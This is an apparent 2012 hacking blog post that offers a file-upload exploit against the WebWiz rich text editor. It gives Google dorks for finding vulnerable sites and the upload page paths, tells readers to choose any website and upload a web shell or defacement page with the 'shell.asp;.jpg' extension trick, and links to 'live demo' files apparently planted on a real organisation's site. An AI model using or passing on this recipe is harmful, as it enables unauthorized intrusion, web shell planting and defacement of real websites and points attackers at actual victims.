Trending: TeCh ZoNe

Sunday, April 8, 2012

Website hackz RTE webwiz vulnerability | file upload exploit



 RTE exploit: file upload vulnerability of Webwiz websites


Webwiz rich text editor HTML code is carried in the
open after they are sent charCode due functioning of the page 


Google Dorks: 

[1].inurl:rte/my_documents/my_files
[2].inurl:/my_documents/my_files/ 

search these dorks on google choose any website.

Exploit:
[1].website.com/rte/RTE_popup_file_atch.asp
[2].website.com/admin/RTE_popup_file_atch.asp



Site:
 http://www.example.com

http://www.example.com/RTE_popup_file_atch.asp

now you will receive a uploading option

you can also upload a shell or directly your deface

page shell format:- shell.asp;.jpg


live demo:

[1]
http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/ZFZ_!nD!_C0d3_Br3ak3.html

[2]  http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/4FB_cyb3r_shr3y@sh.jpg 

All Rights Reserved TeCh ZoNe | Blogger Template by Bloggermint
back to top